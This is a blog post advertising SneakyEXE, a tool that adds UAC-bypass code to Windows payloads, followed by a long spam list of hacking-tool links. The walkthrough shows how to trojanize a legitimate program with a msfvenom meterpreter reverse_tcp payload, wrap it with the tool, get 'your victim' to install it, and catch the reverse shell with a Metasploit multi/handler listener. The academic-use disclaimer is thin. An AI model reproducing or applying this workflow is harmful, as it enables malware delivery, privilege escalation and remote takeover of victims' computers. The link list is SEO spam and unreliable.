Monday, August 31, 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


More info

  1. Pentest Tools Subdomain
  2. Hacker Tools For Ios
  3. Hacker Tools Github
  4. Pentest Tools Github
  5. Hack And Tools
  6. Physical Pentest Tools
  7. Hacker Tools Hardware
  8. Hackrf Tools
  9. Hack Tool Apk
  10. Hacking Tools Hardware
  11. Pentest Tools Port Scanner
  12. Hacker Tools Mac
  13. Pentest Tools Apk
  14. Pentest Tools
  15. Hacking Tools Windows 10
  16. Game Hacking
  17. Beginner Hacker Tools
  18. Pentest Tools Linux
  19. Hacking Tools Kit
  20. Hacking Tools Online
  21. Hacking Apps
  22. Github Hacking Tools
  23. Hacker Tools 2019
  24. Hacker Tools Free
  25. Hack Tools Online
  26. Hackers Toolbox
  27. Nsa Hack Tools
  28. Easy Hack Tools
  29. Hacker Tools Windows
  30. Pentest Tools Bluekeep
  31. Computer Hacker
  32. Tools Used For Hacking
  33. Pentest Tools Tcp Port Scanner
  34. Hacker Tools Online
  35. Pentest Tools Online
  36. Kik Hack Tools
  37. Hackers Toolbox
  38. What Is Hacking Tools
  39. Best Pentesting Tools 2018
  40. Pentest Tools List
  41. Pentest Tools Website Vulnerability
  42. Hacker Techniques Tools And Incident Handling
  43. Beginner Hacker Tools
  44. Best Hacking Tools 2020
  45. Pentest Tools Nmap
  46. Pentest Tools Download
  47. Hacking Tools 2019
  48. Hacking Tools For Mac
  49. Hacking Tools Software
  50. What Is Hacking Tools
  51. Hacking Tools For Beginners
  52. Tools Used For Hacking
  53. Hacking Tools 2019
  54. Hacking Tools For Kali Linux
  55. Hack Tools For Ubuntu
  56. Hack Website Online Tool
  57. Hacker Tools For Pc
  58. Hacking Tools Github
  59. Install Pentest Tools Ubuntu
  60. Hack Tools Github
  61. Hack And Tools
  62. Nsa Hacker Tools
  63. Hacks And Tools
  64. Hacking Tools For Games
  65. Hacker Tools Github
  66. Black Hat Hacker Tools
  67. Hack Tools Github
  68. Hacker Tools Windows
  69. Hacks And Tools
  70. Nsa Hack Tools Download
  71. Hacking Tools For Windows 7
  72. Hacker Tool Kit
  73. Hacking Tools For Pc
  74. Hacker Tools For Windows
  75. Hacking Tools Pc
  76. Pentest Tools Download
  77. Hack Tools For Windows
  78. Hack Website Online Tool
  79. Black Hat Hacker Tools
  80. World No 1 Hacker Software
  81. Hack Tools For Windows
  82. Termux Hacking Tools 2019
  83. Tools 4 Hack
  84. Hacking Tools Free Download
  85. Hack Tools Github
  86. Pentest Box Tools Download
  87. Github Hacking Tools
  88. Pentest Automation Tools
  89. Hacker Techniques Tools And Incident Handling
  90. Hacking Tools Free Download
  91. Hack Tool Apk No Root
  92. Hacking Tools Github
  93. Hacking Tools Kit
  94. Pentest Tools Website Vulnerability
  95. Hack Tools For Games
  96. Pentest Tools Linux
  97. How To Hack
  98. Hacks And Tools
  99. Hacker Hardware Tools
  100. Growth Hacker Tools
  101. Hacking Tools For Games
  102. Hacker Tools Apk
  103. Pentest Tools Kali Linux
  104. Hack Tools Github
  105. Hacking App

0 comments